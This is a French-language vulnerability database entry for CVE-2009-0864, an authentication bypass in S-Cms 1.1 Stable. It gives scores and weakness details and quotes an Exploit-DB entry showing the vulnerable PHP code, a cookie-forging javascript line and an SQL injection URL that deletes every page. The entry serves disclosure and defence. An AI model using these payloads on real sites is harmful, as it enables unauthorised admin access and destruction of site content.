CVE-2009-0864 : Détail

CVE-2009-0864

Authorization problems
A07-Identif. and Authent. Fail
0.65%V3
Network
2009-03-10
13h00 +00:00
2017-09-28
10h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

S-Cms 1.1 Stable allows remote attackers to bypass authentication and obtain administrative access via an OK value for the login cookie.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-287 Improper Authentication
When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 8071

Date de publication : 2009-02-16 23h00 +00:00
Auteur : x0r
EDB Vérifié : Yes

######################################################################################### [0x01] Informations: Name : S-Cms 1.1 Stable Download : http://www.hotscripts.com/listings/jump/download/87992/ Vulnerability : Insecure Cookie Handling / Mass Page Delete Author : x0r Contact : andry2000@hotmail.it Notes : Proud to be Italian ######################################################################################### [0x02] Bug: Bugged file is /[path]/login_action.php ... /admin/delete_page.php [Code] $user=$_POST['username']; $pass=$_POST['password']; $select_admin = mysql_query("SELECT * FROM cms_admin"); while($dati_admin=mysql_fetch_array($select_admin)){ $username=$dati_admin['username']; $password=$dati_admin['password']; } if ($user == $username && $pass == $password){ setcookie("login", "OK", time() + $logintime); #0wn3d [/code] [CODE] $id=$_GET['id']; $delete=mysql_query("DELETE FROM cms_content WHERE id='$id'"); if ($delete){ echo ""._DELETE_PAGE_SUCCESS.""; } else { echo ""._DELETE_PAGE_ERROR.""; [/code] ######################################################################################### [0x03] Exploit: Exploit: 1- javascript:document.cookie = "login=OK; path=/" 2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/* ######################################################################################## # milw0rm.com [2009-02-17]

Products Mentioned

Configuraton 0

Matteoiammarrone>>S-cms >> Version 1.1

    Références

    http://www.securityfocus.com/bid/33799
    Tags : vdb-entry, x_refsource_BID
    https://www.exploit-db.com/exploits/8071
    Tags : exploit, x_refsource_EXPLOIT-DB